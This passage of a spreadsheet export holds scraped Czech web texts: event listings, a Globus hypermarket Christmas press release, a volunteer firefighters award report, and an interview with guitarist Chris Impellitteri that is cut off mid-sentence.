    <t>Ladislav Zibura – Naposledy pěšky po Arménii a Gruzii (Besedy a přednášky) Úvod &amp;gt; Akce v Ostravě &amp;gt; Besedy a přednášky &amp;gt; Ladislav Zibura – Naposledy pěšky po Arménii a Gruzii Ladislav Zibura – Naposledy pěšky po Arménii a Gruzii Besedy a přednášky 01. prosince 2024 15:00 Dům kultury Poklad Poutník, spisovatel a blonďatý rošťák Ladislav se na podzim vrací do porubského Pokladu. Tentokrát se vydáme za krásnou krajinou, sovětskou nostalgií a pohostinnými lidmi Kavkazu . Přijďte, bude legrace! Excentrický poutník Ladislav Zibura se v létě 2017 vydal probádat Arménii , Gruzii a Náhorní Karabach . Očekává nenáročný výlet, situace se mu však brzy vymkne z nohou. Ať už se princ Ládík zrovna otráví alkoholem , zabloudí na minové pole nebo zachraňuje život štěňátek, vším proplouvá s neobyčejnou lehkostí. Příběh jeho pěší, cyklistické a stopařské výpravy je svědectvím o jednoduchosti života a půvabu svobody, u kterého se budete smát od začátku až do konce. Nečekejte popisy historie nebo památek. Cestovatelská projekce Ladislava Zibury je plná humoru, lidských příběhů a lidové moudrosti. V prodeji v infocentrech OSTRAVAINFO, bez možnosti rezervace 350,- DALŠÍ AKCE v místě (67) Autor: web Autor person web</t>
  </si>
  <si>
    <t>20241201_327_3473484453_6e0c192df9772f49adaa.html</t>
  </si>
  <si>
    <t>6e0c192df9772f49adaa</t>
  </si>
  <si>
    <t>Vánoce do Globusu přináší řadu novinek</t>
  </si>
  <si>
    <t>Vánoce do Globusu přináší řadu novinek V hypermarketech Globus se letos zřejmě stane před Vánoci rekord. Tamní pekaři a cukráři totiž budou ručně vyrábět největší množství vánočního pečiva za poslední roky, reagují tak na zvýšenou poptávku zákazníků. Ti mohou v Globusu nově koupit cukroví i na váhu. Řezníci tradičně nachystají sváteční šunky i vinné klobásky a v nápojích budou připraveny oblíbené dárkové kazety prémiových vín a destilátů. V sortimentu sportu a hraček najdou lidé 60 % novinek, nebudou chybět ani oblíbené elektrokoloběžky. Před Vánoci hypermarkety Globus upraví běžnou otevírací dobu. Každoročně si odtud odnesou miliony nákupů. Jsou to dárky, vánoční ozdoby, kolekce na stromečky, čerstvé potraviny včetně vánoček a cukroví, maso, kapři a mnoho dalšího. To všechno se dá koupit na jediném místě. Řeč je o velkoprostorových hypermarketech Globus, které na šestnácti místech napříč Českou republikou nabízí takřka neomezené možnosti nákupů. Rekordy v ručním pečení K Vánocům neodmyslitelně patří vánoční cukroví a vánočky. A v Globusu je o ně takový zájem, že letos pekaři a cukrářky plánují ručně vyrobit větší množství vánočního pečiva než uplynulé roky. Pro své zákazníky 290 pekařů a 115 cukrářek v Globusu vypracují hned několik druhů máslového cukroví, sněhové pečivo, jemné kokosky, vánoční kuličky z másla i populární chlazená máslová vánoční těsta v osmi druzích. Cukroví lze koupit dle druhu zvlášť, nebo mix cukroví v kazetách po 370 gramech a 600 gramech. „ Už v loňském roce jsme zpracovali mimořádný nárůst objednávek na cukroví, celkem jsme ho upekli na 12 tun a letos plánujeme ručně vypracovat dokonce 14 tun cukroví. Navíc v letošním roce ho plánujeme prodávat také v Café Globus „vážené“, možné bude si i konkrétní gramáž cukroví předem objednat,“ řekl Pavel Meduna, vedoucí výroby šestnácti pekáren a cukráren Globus. Celkem letos pekaři v Globusu spotřebují na 31 tun másla, 13 tun rozinek, 11 tun mandlových plátků. Před letošními svátky mají v plánu také ručně uplést 270 tisíc vánoček, celkem pečou čtyři druhy včetně máslové, kilové De Luxe a vánočních věnců s rozinkami i bez nich, aby si vybral každý. V letošním roce se opět k prodeji vánočky v Globusu váže dobročinná aktivita. Od 13.12. do 24.12.2023 bude Globus z prodeje každé vánočky De Luxe 1 000 gramů věnovat 25 korun na charitativní projekty v lokalitách, kde má hypermarkety. Uzená masa i vinná klobása Čerstvé maso, uzené šunky, klobásky včetně oblíbené vinné, to vše každoročně jde na odbyt u řeznických pultů v Globusu. „ Předvánoční nákupy mas a uzenin jsou vrcholem celého roku. Pro kvalitní masa a uzeniny si tak k nám zajede násobně víc zákazníků než v běžný den. Nakupují se masa na řízky, rolády, pečeně a nechybí ani legendární vinná klobása s podílem vína a hovězího masa dle letité receptury,“ řekl Pavel Holeček z řeznictví Globus. Dodal, že Drůbeží řeznictví, tedy koncept prodeje kuřat, která jsou chována a krmena 56 dní na podestýlce, který znají zákazníci z hypermarketů Globus v Praze , Brně , Pardubicích a Ústí nad Labem , se rozšířil i do Plzně . Kapři celí, porcovaní i bez šupin Globus klade velký důraz na široký výběr, kvalitu a původ surovin, a to jak u chlazených, tak i mražených sladkovodních a mořských ryb. „Samozřejmostí je nabídka kaprů celých, naporcovaných na půlky či na podkovy. Současně u nás není problém sehnat hlavy a gonády, tedy jikry a mlíčí na rybí polévku. Vždy je o ně velký zájem. Pro letošní Vánoce jsme připravili novinku, a to celého mraženého kapra kuchaného bez šupin. Nabízíme široký výběr krevet, mořských ryb jak celých, tak filetů. Nabídku pro letošní rok rozšiřujeme také o marinované slávky a ústřice,“ vysvětlila Aneta Turnovská, tisková mluvčí Globus. Dárkové kazety vín a alkoholu táhnou Letos Globus předpokládá zvýšený zájem o dárkové kazety alkoholu se skleničkami a dalšími dárky, či o vína v dřevěných kazetách. „ Citelná poptávka je také po speciálních vínech, jako jsou vína ledová a slámová. Řada z těchto speciálních artiklů bude součástí promočních aktivit v letácích a vánočních katalozích. Vedle klasických spiritových kategorií jako jsou rumy, whisky či giny jsou v současné době moderním trendem hotové alkoholické míchané nápoje v plechu, které zákazníci preferují pro jejich možnou okamžitou konzumaci při vánočních návštěvách,“ řekla Aneta Turnovská. Hrají si malí i velcí Důležitou nabídku pro zákazníky tvoří v Globusu hračky a hry. „V sortimentu pro děti je nyní 60 % novinek. Nabídka obsahuje předměty ke kreativnímu tvoření, jako jsou make-upy a různé výroby náramků či přívěsků. Máme v prodeji dárky v licenci značek Gabby a Paw patrol či Wednesday. Trefou do černého bývá Lego, u nás mají zákazníci veliký výběr od Duplo přes řadu Minecraft až po velmi oblíbené Lego Technic či různé druhy kytic v edici Lego Icons. V naší nabídce pak nechybí ani populární elektrokoloběžky, které budou figurovat i v nabídce vánočního katalogu. Zájem je každoročně o velké zajímavé plyšáky,“ řekla Aneta Turnovská. Dodala, že Globus má nově Věrnostní program na společenské hry pro všechny věkové kategorie od dodavatele Albi . Jsou zde zastoupeny jak hry pro menší děti, tak i pro starší, dále pak vybrané druhy kouzelného čtení. Otevírací doba: V hypermarketech Globus platí otevírací doba 7 až 21 hodin, výjimkou je hypermarket Globus v Praze na Černém Mostě , kde je otevřeno od 7,30 hodin do 22 hodin a Štěrboholech , kde je otevřeno od 7,30 hod do 21 hod. Podrobnosti jsou uvedeny na webu www.globus.cz a v mobilní aplikaci Můj Globus. Výjimkami budou před Vánoci dny 20. až 23. 12 ., kdy platí na všech hypermarketech Globus mimořádná otevírací doba od 7 do 22 hodin , vyjma hypermarketu Globus Černý Most, který bude mít otevřeno do 23 hodin . Dne 24. 12. bude otevřeno od 7 hodin do 11,45 hodin . Hypermarket na Černém Mostě a ve Štěrboholech zavře již o čtvrt hodiny dříve, tedy v 11,30 hodin . O svátcích 25. 12. a 26. 12. jsou všechny provozovny Globus uzavřeny. Otevřeno bude opět 27. 12. a to v běžných provozních hodinách. Dne 31. 12. platí mimořádná otevírací doba od 7 do 18 hodin ve všech šestnácti hypermarketech Globus. Redakce FFN a www.globus.cz Autor: Jakub Míšek Autor person Jakub Míšek</t>
  </si>
  <si>
    <t>551</t>
  </si>
  <si>
    <t>20241201_328_3473484969_3538b4c4f938c22607ac.html</t>
  </si>
  <si>
    <t>3538b4c4f938c22607ac</t>
  </si>
  <si>
    <t>Kalendarium Architektura ČSSR 58–89 06.prosinec - pátek od 17:30 hodin Unikátní dokument v režii Jana Zajíčka o československé předrevoluční architektonické scéně. Tvůrci neobyčejně a s vášní představují výjimečné budovy postavené v období od Expa 1958 po sametovou revoluci, zpovídají jejich architekty, odhalují příběhy a nesmírné úsilí, které se za vznikem těchto staveb skrývá. Dokument navazuje na úspěšný knižní projekt a seriál z produkce České televize podle námětu Vladimira 518 , oproti zmíněným se více zaměřuje na bohatou slovenskou tvorbu. Obrazová a střihová originalita podtrhuje mimořádnost tohoto filmového projektu. Řada staveb a bohužel i autorů se již nedožila premiéry snímku, a dokument je tak důležitou připomínkou jejich tvůrčího nadání a odkazu. 160 vstupné 160 Kč | Malý sál | Bio Central Malý sál 2024-12-06 17:45:00 2024-12-06 19:15:00 Andy Warhol – The American DreamAndy Warhol – americký sen 06.prosinec - pátek od 17:45 hodin Příběh o tom, jak se Andy Warhol , syn slovenských imigrantů v USA , stal ikonou 20. století a zařadil se mezi pár osobností, které měly globální přesah a kompletně změnily náhled na umění. Jeho životní příběh je fascinující, z věčně neduživého chlapce žijícího ve slovanském ghettu v Pittsburghu se stal jedním z nejvlivnějších umělců všech dob – mezi osobnosti, se kterými spolupracoval, patří mimo jiné Marilyn Monroe, John Wayne , Mick Jagger nebo Liz Taylor . Jak se mu podařilo dosáhnout až na vrchol uměleckého světa a co nejvíce ovlivnilo jeho tvorbu? Málo se ví o tom, jak velký vliv na jeho tvorbu měla rusínská kultura a zejména hluboká víra v Boha, ke které se obracel až do své smrti. První část filmu se ale vrací do dávné minulosti, kdy z chudých částí Zakarpatské Rusi a východu Slovenska odcházely stovky mužů i žen za prací do Ameriky a dalších částí světa. Byli mezi nimi i Ondřej Varchola a jeho žena Julie, budoucí rodiče Andyho Warhola . Věděli, že jim se amerického snu dosáhnout nepodaří, zasvětili ale celý život tomu, aby vybudovali lepší podmínky pro svého syna, kterému se tak již v útlém věku otevřely dveře do světa umění. 160 vstupné 160 Kč | Velký sál | Bio Central Velký sál 2024-12-06 18:00:00 2024-12-06 22:00:00 VÁNOČNÍ KARIBIK | BACHATA &amp;amp; SALSA 06.prosinec - pátek od 18:00 hodin V pátek 6.12. vás zveme opět na palubu Lodivadla, tentokrát se ale můžete těšit na taneční party ve vánočním módu. Čeká vás: - vyhřívaný prostor s nově vybudovaným barem, - welcome drink zdarma, - vystoupení našich kurzistů, - taneční parket tak, jak ho znáte z letních tančíren. Jako obvykle je pro vás připravena i lekce, tentokrát pro všechny mírně pokročilé tanečníky, kteří si chtějí rozšířit taneční repertoár. Harmonogram akce: 18:00 – 19:00 | lekce bachatypro mírně pokročilé 19:00 – 22:00 | taneční party PŘIHLAŠOVÁNÍ CHCI NA LEKCI I PARTY Na lekci je třeba se přihlásit a zaplatit předem prostřednictvím formuláře na webu. Přihlašování je otevřeno vždy do předchozího dne. Pokud nestihnete přihlášku předem, je možnost zaplatit na místě, ale nemůžeme garantovat tanečního partnera/partnerku. Cena předem 250 Kč, cena na místě 300 Kč. Přihlašování probíhá v páru i jednotlivě, jen je třeba zaškrtnout, zda jste leader (muž), nebo follower (žena). V ceně je: https://katybedliva.cz/udalost/vanocni-karibik-v-lodivadle-bachata-lekce-party CHCI JEN NA PARTY Pokud nemáte zájem se účastnit lekce, nebo je naplněna kapacita, není problém přijít jen na tančírnu. Vstup na tančírnu lze koupit předem online za 120 Kč, nebo na místě za 150 Kč. https://katybedliva.cz/udalost/vanocni-karibik-v-lodivadle-bachata-salsa-party/ Na co se připravit? Ačkoliv bude prostor vyhříván a věříme, že se při tanci zahřejete, zvolte teplejší oblečení a boty. Určitě neuděláte chybu, když budete outfit ladit do vánočních barev. K dispozici bude bar s klasickou nabídkou obohacenou o teplé vánoční nápoje. Prosíme, nenoste si vlastní pití. 06.prosinec - pátek od 18:30 hodin · hvězdná obloha, virtuální vesmír a celooblohová filmová projekce Jiné světy · digitální planetárium · 90 minut · pořad vhodný pro dospělé a mládež od staršího školního věku V digitálním planetáriu se nejprve podíváme na aktuální noční oblohu bez světelného znečištění. Následně podnikneme virtuální cestu do vesmíru. V poslední části programu zhlédneme celooblohovou filmovou projekci Jiné světy. Všechny návštěvníky žádáme, aby naše zařízení nenavštěvovali s příznaky jakéhokoliv infekčního onemocnění či zvýšenou teplotou. Dodržujte pokyny pracovníků zajišťujících program, ustanovení Návštěvního řádu a aktuálně obecně platná opatření či doporučení. Změna programu vyhrazena. Upozorňujeme, že z bezpečnostních důvodů není možné vstupovat do sálu digitálního planetária po zahájení programu. Snížené vstupné na programy Hvězdárny a planetária v Hradci Králové je určeno pro děti do 10 let, žáky a studenty od 10 do 26 let, držitele průkazek ZTP/P a seniory od 65 let. „WINTER STRINGS“ TEREZIE KOVALOVÁ &amp;amp; JAN VESELÝ , VOL. 2 06.prosinec - pátek od 19:00 hodin Po úspěšně vyprodaném koncertu „Winter Strings“ v roce 2023 v Praze se violoncellistka Terezie Kovalová a klavírista Jan Veselý rozhodli, že koncert zopakují a to v PETROF Hall, v Hradci Králové dne 6. prosince 2024. Jedná se o příležitost jak se naladit na vánoční atmosféru, bez vánočního klišé. Terezie Kovalová a Jan Veselý připravili multižánrový program, který rozhodně nezahrnuje jen koledy. Nechte se unést ve sférách filmové, současné i klasické hudby. Speciálním blokem bude pro tento koncert navíc i sféra vánočních skladeb. Uslyšíte zde například skladbu „Phantom Of The Opera“, či skladbu „Cats“ z muzikálu „Kočky“. Jako host vystoupí na koncertě také frontman pop-rockové kapely The Silver Spoons , Augustine Dunn . 06.prosinec - pátek od 19:00 hodin ŽENY POMÁHÁJÍ ORGANIZACI FANDI MÁMÁM!: TJ SLAVIA HK – VOLEJBAL RUDOLFOV KDY: Pátek 6. prosince od 18 hodin KDE: hala TJ Slavia Hradec Králové , Orlická kotlina Již třetím rokem pomůže družstvo hradeckých volejbalistek sbírkou organizaci FANDI MÁMÁM, která pomáhá maminkám samoživitelkám. Sbírka proběhne v rámci dobrovolného vstupného do kasičky během utkání. Vybraná částka pak poputuje v plné výši organizaci Fandi Mámám. Ženy se představí v prvním utkání nadstavby proti Rudolfovu a pokusí se získat. první body v boji o dvě postupové příčky do play-off. Přijďte je podpořit a zároveň pomoci dobré věci. Těšit se můžete na stánek od restaurace Slávka jako vždy. LAJZY BEANS 06.prosinec - pátek od 19:00 hodin Srdečně zveme na komorní koncert kapely The Lejzy Beans. Na co se můžete těšit? Převážně na cover verze populárních hitů od Beatles , Neila Younga , Rolling Stones , Allanis Morissett apod. A samozřejmě si také užijete příjemnou atmosféru, dobré víno a pohodu, po jaké člověk touží v uspěchaném předvánočním čase. Vstupné dobrovolné. VLASTNÍCI 06.prosinec - pátek od 19:30 hodin Domovní schůze, která prozradí o naší společnosti mnohem víc, než by nám bylo milé. Satirická komedie v režii Aleše Dvořáka. Omezená kapacita míst. YAMATO - THE DRUMMERS OF JAPAN 06.prosinec - pátek od 20:00 hodin Celosvětově proslulý bubenický ansámbl YAMATO z japonského hlavního města bubenického řemesla Prefektury Nara , se po dvou letech vrací zpět do České republiky ! Fenomenální bubeníci plánují na rok 2024 světové turné s novým konceptuálním představením ”Hinotori - The wings of the Phoenix“ a v rámci World Tour 2024 zavítají také do šesti měst České republiky . Představí se postupně v Ostravě , Zlíně , Plzni , Hradci Králové , Brně a turné zakončí v Praze . V roce 2024 bubeníci vyjíždějí s novým představením ”Hinotori - The wings of the Phoenix“, které bude oslavou pohybu, vytrvalosti, pevné vůle v cestě za zdrojem života – Sluncem. Jak už jsme u souboru YAMATO zvyklí, bude to opět strhující audio-vizuální show, která vás zvedne ze sedadel! Bubeníci YAMATO si vždy svou propracovanou kompozicí doslova podmaní publikum, vyprodávají sály po celém světě, sklízí ovace a skvělé recenze. 2 hodiny nekonečné energie Taiko bubeníků YAMATO – The Drummers of Japan je vždy nezapomenutelným zážitkem pro všechny věkové skupiny. Vstupenky zakoupíte v prodejních sítích Ticketportal a Ticketstream . SKYLINE 06.prosinec - pátek od 20:00 hodin Nejrozjetější česká elektronická kapela se vrací do Hradce Králové na NáPLAVKU! A nebude to návrat ledajaký, ale rovnou s novým albem, které vychází v září! Předprodej na smsticket. Wicked 06.prosinec - pátek od 20:00 hodin Člověk, který nezapadá, to má v životě obvykle o něco těžší než ostatní. A co teprve, když je jeho „nezapadání“ vidět na první pohled. Budoucí studentka univerzity pro čaroděje Elphaba (Cynthina Erivo) se od ostatních liší tím, že je od hlavy až k patě zelená. Osud se jí to pokusil vykompenzovat, když jí nadělil mimořádný kouzelnický talent. Toho má pro změnu nevalné množství její spolužačka Galinda ( Ariana Grande ), která je na první pohled opravdu okouzlující. Tyhle dva absolutní protiklady zpočátku spojuje jen vzájemná nevraživost a společný pokoj, jenž jim (jistě s nějakým skrytým úmyslem) přidělila děkanka čarodějnické fakulty Madam Morrible ( Michelle Yeoh ). Z počáteční nesnášenlivosti se postupem času zrodí velké přátelství a spojenectví mimořádných dívek, jejichž schopností bude brzy zapotřebí. Nad celou říší Oz se stahují pomyslná temná mračna, a pokud ji nezachrání Mocný čaroděj ( Jeff Goldblum ), budou muset přiložit ruku k dílu ony. 160 vstupné 160 Kč | Velký sál | Bio Central Velký sál 2024-12-06 20:30:00 2024-12-06 22:20:00 Heretic 06.prosinec - pátek od 20:30 hodin Přichází šířit slovo boží, aniž by tušily, že nejtěžší zkouška jejich víry je teprve čeká, až překročí práh domu okouzlujícího pana Reeda. Zazvonit na domovní zvonek a přijmout jeho pozvání na borůvkový koláč se ukáže jako ten nejhorší nápad, i když venku hřmí a leje. Skutečné prozření totiž přichází ve chvíli, kdy se za dvěma mladými mormonkami zavřou dveře. Právě tehdy začíná smrtící hra na kočku a myš. A její stvořitel Hugh Grant je v ní rafinovaný jako nikdy předtím. Ďábelsky rafinovaný. Autor: OMEGA Czech - info@omegaczech.cz</t>
  </si>
  <si>
    <t>20241201_329_3473484476_cd57494a484ca2b1b957.html</t>
  </si>
  <si>
    <t>cd57494a484ca2b1b957</t>
  </si>
  <si>
    <t>Město Litomyšl - Kalendář akcí</t>
  </si>
  <si>
    <t>Město Litomyšl - Kalendář akcí Kino Sokol Film Zápisník alkoholičky vypráví dramatický příběh mladé ženy bojující se závislostí na alkoholu . Hlavní hrdinkou (byť se jako hrdinka mnohdy nepůsobí) je mladá maminka, která se rozhodla nevzdat, nastoupit léčbu a bojovat se svým démonem i o svou rodinu. Jak těžké je si problém s pitím přiznat? Proč není... Detail akce Dům U Rytířů - Městská galerie Litomyšl Netradiční adventní jarmark. Přijďte se v předvánočním čase rozloučit s domem U Rytířů tak, jak jste ho znali. V zadním traktu, který společně s celou budovou čeká od nového roku masivní rekonstrukce, se v den s magickým datem 12. 12. uskuteční příjemné setkání přátel městské galerie. Součástí setkání bude... Detail akce Autor: Město Litomyšl</t>
  </si>
  <si>
    <t>1550</t>
  </si>
  <si>
    <t>20241201_33_3479304572_6dd514ec831b5ce9c305.html</t>
  </si>
  <si>
    <t>6dd514ec831b5ce9c305</t>
  </si>
  <si>
    <t>Slavnostní předávání cen dobrovolným hasičů uzavřelo 14.&amp;nbsp;ročník Ankety Dobrovolní Hasiči Roku, padesátka nejlepších převzala ocenění za zásahy a činnost</t>
  </si>
  <si>
    <t>Slavnostní předávání cen dobrovolným hasičů uzavřelo 14.&amp;nbsp;ročník Ankety Dobrovolní Hasiči Roku, padesátka nejlepších převzala ocenění za zásahy a činnost V pátek 29. listopadu na slavnostním vyhlášení výsledků 14. ročníku Ankety Dobrovolní Hasiči Roku převzalo čestné ocenění 25 jednotek a 25 sborů dobrovolných hasičů z celé České republiky . Tento významný titul udělila Odborná porota Ankety již po čtrnácté. Prestižní skleněnou helmu, která je symbolem Ankety, si z brněnského Bobycentra odneslo deset oceněných s největším počtem hlasů. Oceněné v roli moderátorky večera tentokrát přivítala Barbora Černošková . Záznam z předávání odvysílá Česká televize 14. prosince na programu ČT2. Finalisté 14. ročníku Ankety Dobrovolní Hasiči Roku obdrželi zasloužená ocenění z rukou představitelů profesionálních i dobrovolných hasičů, partnerů Ankety, kteří dobrovolné hasiče v jejich činnosti dlouhodobě a významně podporují a dalších čestných hostů. V rámci letošního 14. ročníku pořadatelé zaznamenali rekordní zájem veřejnosti o hlasování. Příběhy ze zásahů a činností letošních finalistů projevilo zájem přes 130 tisíc unikátních návštěvníků stránek. Společně s hlasováním prostřednictvím webového formuláře a SMS bylo odevzdáno téměř 70 tisíc platných hlasů, což je nejvíce v historii Ankety. „Jako předseda Odborné poroty blahopřeji k získaným oceněním a děkuji všem dobrovolným hasičům, a také těm, kteří je prostřednictvím této Ankety podporují. Obrovský zájem o letošní hlasování je podle mého mínění jasným důkazem, nakolik si veřejnost uvědomuje, že spolupráce mezi profesionálními a dobrovolnými sbory je klíčová pro efektivní a rychlou reakci při krizových situacích. Neocenitelný přínos dobrovolných hasičů se koneckonců nedávno plně ukázal, a to během zářijových ničivých povodní,“ uvedl generální ředitel HZS ČR, generálporučík Ing. Vladimír Vlček , Ph.D., MBA. Díky dlouholetým partnerům Ankety obdrželi finalisté na prvních třech místech kromě ocenění i finanční a věcné dary v hodnotě přesahující 2,4 miliony korun. „Jako generální partner Ankety oceňujeme práci dobrovolných hasičů už 14 let. Současně podporujeme i dobrovolnickou činnost našich zaměstnanců, tedy například jejich účast na zásazích s hasiči. Ve zlepšování podmínek pro dobrovolné hasiče teď chceme udělat další ambiciózní krok: Už brzy představíme celonárodní iniciativu sdružující a motivující firmy přátelské ke svým zaměstnancům-dobrovolným hasičům,“ prozradil Petr Koutný, provozní ředitel společnosti GasNet a člen Odborné poroty. Vedle oceňovaných dobrovolných hasičů vznikla za podpory Ondřeje Vetchého , který je patronem Ankety i Českého národního registru dárců dřeně, nová kampaň s názvem „Buďte jako Ondřej“ , která je zaměřená na motivaci nových dárců kostní dřeně. MUDr. Pavel Jindra, vedoucí lékař registru, prozradil, že se díky této kampani podařilo během pár měsíců zaregistrovat přes 10 tisíc nových dárců a poděkoval právě dobrovolným hasičům, které kampaň nejvíce oslovuje. Generálním partnerem Ankety je od počátku společnost GasNet . Hlavními partnery Ankety jsou společnosti ČEZ , Lesy České republiky , Ford Motor Company a DCom. Partnery Ankety jsou společnosti EG.D., Pražská plynárenská Distribuce, Požární bezpečnost, Medsol, ČEPS, TATRA TRUCK , GoodPRO , ZPMV, Hasičská vzájemná pojišťovna, Techsport, Selfbrand, FILIPA, GINA Software, Poctivá od Mattoni 1873, Víno Prokeš, Rescop a Teleskopické stožáry. Hlavním partnerem slavnostního večera byla společnost Czechoslovak Group . Partnery večera byly společnosti E.ON Energie a Bobyhall. Oceňování dobrovolných hasičů probíhá pod záštitou ministra vnitra Mgr. Bc. Víta Rakušana , 1. místopředsedy vlády a ministra financí Ing. Zbyňka Stanjury , ministra zemědělství Mgr. Marka Výborného , generálního ředitele HZS ČR generálporučíka Ing. Vladimíra Vlčka a náměstka generálního ředitele HZS ČR brig. gen. Mgr. Slavomíra Bella. Spolupracujícími organizacemi jsou Hasičský záchranný sbor ČR, Sdružení hasičů Čech , Moravy a Slezska , Moravská hasičská jednota, Česká hasičská jednota. Detailní výsledky s pořadím dle obdržených hlasů najdete na www.adhr.cz Jiří Bezděk prezident spolku</t>
  </si>
  <si>
    <t>6940</t>
  </si>
  <si>
    <t>20241201_330_3473483694_0377474fc6ddc4217ee9.html</t>
  </si>
  <si>
    <t>0377474fc6ddc4217ee9</t>
  </si>
  <si>
    <t>Chris IMPELLITTERI (IMPELLITTERI) - Tahle kapela je jako válečný stroj</t>
  </si>
  <si>
    <t>Shrnutí Chris IMPELLITTERI (IMPELLITTERI) - Tahle kapela je jako válečný stroj Chris Impellitteri se vrací po šesti letech, což je jeho nejdelší pauza za celou kariéru. Možná trochu vynucená covidovou pandemií, ale na výsledku v podobě desky „War Machine“ se nijak moc nepodepsala. Kytarista je na album náležitě pyšný, což je znát i z prohlášení, že se jedná o jeho nejlepší desku, ale i z toho, že na bubenickou stoličku usadil jednoho z nejlepších hráčů žánru Paula Bostapha . Chris o něm prozradil, že Bostaph čerstvě opustil kapelu Kerryho Kinga a chystá se s Impellitteri vyrazit na turné. To se nebude odehrávat na stadionech, ovšem Impellitteriho parta patří mezi ty, které mají věrné fanoušky, jimž nabízí stabilní, prověřenou kvalitu. Takoví Van Halen na steroidech, jak říká Chris… Ano i ne. Samozřejmě, aktuálně se ve světě dějí dva celkem zásadní konflikty, první z nich, když Rusko napadlo Ukrajinu , a to, co se děje teď mezi Palestinou a Izraelem . Bůh ví, jestli nepřijde nějaká třetí válka. A já jsem všemi deseti proti válce. Ale reálně je to spíš metafora toho, že skupina Impellitteri je sama o sobě válečný stroj. Celou naši existenci jsme museli bojovat, abychom byli akceptováni, a i když máme na světě spoustu fanoušků, showbyznys se k nám choval spíš jako k nechtěnému děcku, které musí akceptovat, protože to fanoušci chtějí. Proto se snažíme co nejvíc dostat k našim fanouškům, protože bez nich bychom těch pětatřicet let nevydrželi. Proto „War Machine“, protože celou dobu bojujeme proti silám, které se nás snaží dostat. Ale zároveň je to reakce na globální konflikty. Ta hudba je prostě v nás. Není to vědomé rozhodnutí, že si řekneme: „Tak a teď uděláme album v tomhle nebo tomhle stylu!“ Ta hudba odráží nás, jakožto lidské bytosti, to, co prožíváme v životě. S „War Machine“ jsme měli štěstí, protože lidi nám neustále říkají, že je to skvělé album. A hudba se opravdu tvoří jakoby sama od sebe. Já si často doma sóluju na kytaru, piluju techniku a často se mi povede úplně náhodnou narazit na skvělý riff. Ten se rozvine o další nápady a najednou je z toho melodie. Tak to vyroste v celou skladbu, což je případ této desky. Pak už s tím jen přijdu za ostatními, ti si tam přidají vlastní části, Rob (Rock, zpěvák, pozn. auz.) napíše texty a melodie Pak už se to všechno jen slije do výsledného alba. Když jsme dopsali asi dvanáctou nebo patnáctou písničku, tak jsme měli diskuzi, kdo by měl sedět za bicími, aby hudbu udělal více energickou. Víc nebezpečnou a plnou napětí. Navrhli jsme několik různých bubeníků, a pamatuji si, že mě napadlo Paula kontaktovat a přibližně po týdnu se nám ozval. A pak jsme si ještě zavolali a vzali ho. On do toho vnáší oheň a energii, a pomáhá nám tu hudbu pozvednout. Psaní pro mě začne vždycky vymyšlením riffu. Jakmile ho máme, jdeme na předzpěv, zpěv a tak. Už předtím ale slyším v hlavě hlas Roba Rocka a vím,, jak chci, aby to znělo. Jakmile mám představu, tak si udělám rychlé demo a pošlu ho dál. Diskutujeme o tom, vylepšujeme to a pak to zase pošleme Robovi , který na tom buď staví, nebo ho napadne něco lepšího. Texty na albu byly ovlivněné válkami, o kterých jsme mluvili. „Power Grab“ je o invazi Ruska na Ukrajinu , alespoň z pohledu Američana, „Hell On Earth“ o tom, co se děje v Gaze , což je šílené. Umírají tam děti a nevinní lidé. Člověk chce, aby to skončilo. Aby to bylo taky pozitivní, tak jsme přidali dvě metalové hymny „Out Of My Mind (Heavy Metal)“ a „Light It Up“. Je to o tom, jaké to je jít na koncert Impellitteri, je to inspirované našimi fanoušky a tím, jak nás vnímají. Tyhle dvě budeme určitě hrát naživo a věřím, že lidi budou zpívat každé slovo. Aby si po naší show řekli, že je to jako Van Halen na steroidech. „Nature Of The Beast“ byla zábava nahrávat a zároveň je to rozšíření předchozí nahrávky „Venom“. Ta byla trochu agresivnější a proto přišla „Nature“, která všechno uklidnila. Na „War Machine“ jsme chtěli dát tohle všechno, oheň v mojí kytaře, rozsah Robova zpěvu a sílu jeho hlasu, monstrózní sílu rytmické sekce, to všechno do sebe zapadalo a každý jednotlivý kousek posouval nahrávku dál. Udělali jsme nejlepší nahrávku, kterou jsme kdy nahráli. „Superkingdom“ je nejoblíbenější písnička Roba Rocka. Moje je buď „Wrathchild“ nebo „Light It Up“. Ale aby to nevyznělo špatně, miluju celé album, všechny jeho skladby. Na tom jsme se shodli i s Paulem, který s námi bude na turné v Japonsku . Nevím, jestli to víš, ale Paul je čerstvě pryč od Kerryho Kinga , tak je volný. Během covidu jsem začal psát a už jsem se nezastavil. Dělal jsem skladbu za skladbou, dokud jsem za čtyři roky nenasbíral patnáct věcí, o kterých jsem byl přesvědčený, že za to stojí. Jakmile jsem tohle měl, tak jsem svolal kapelu dohromady, protože bez toho, aniž bychom si to zkusili naživo, tak to není ono. Hned potom jsme s tím šli do Anarchy Studios v Hollywoodu , kam jsme se téměř nastěhovali. Tam se povedlo zachytit veškerou úžasnou magii. A všechno je to čerstvé, letos nahrané. Rob nás opustil dvakrát. Úplně první album bylo „Black EP“, ještě před tím, než měla Metallica svoje „Black album“. ( smích ) „Black EP“ nás světu představilo jako kapelu Impelliteri, ale potom chtěl Rob jít jiným směrem a založil novou kapelu v Německu . Tak se k nám připojil Graham Bonnet a nahráli jsme „Stand In Line“, což se stalo úspěšnou věcí jak v USA , tak v Japonsku . Nahrávka byla trochu jiná, byla spíš v Grahamově stylu, místo toho, kam jsme s Impellitteri chtěli jít s „Black EP“. V zásadě stejné to bylo i u alba „Pedal To The Metal“. Rob chtěl vydat něco vlastního a odpojil se na nějakou dobu. „Pedal To The Metal“ má být primárně parodické album, nikdy jsme ho nebrali příliš vážně. U toho jsme se chtěli spíš plně položit do nového zvuku devadesátých let a pro srandu si to taky vyzkoušet. Zpětně možná nebylo nejchytřejší to zařadit do repertoáru Impellitteri, protože moc nezní jako my. Spíš to byl zábavný projekt. Graham se k nám připojil v roce 1987, kdy byl hodně známý. Když byl Graham v Rainbow , hrál na festivalu Monsters Of Rock v Castle Donnington. Tehdy byli Rainbow headlineři a hráli tam pro sto tisíc lidí, nebo něco takhle obřího. A předskokany jim dělali AC/DC, Judas Priest a podobní. Takže když se přidal k Impellitteri, byl hvězda. Zároveň byl o dost starší, dost na to, aby to byl můj táta. Jeho hlas je absolutně legendární, snad úplně nejlepší, protože není moc těch, co zvládnou zpívat jako on, možná Ronnie James Dio , Rob Halford , Bruce Dickinson , ale moc lidí bych takhle nevyjmenoval. Zkušenost to byla dobrá i špatná. Miloval jsem s ním spolupracovat, byl jsem nadšený z titulní skladby „Stand In Line“, protože Graham jí dál tvář a byli jsme hodně úspěšní. Na 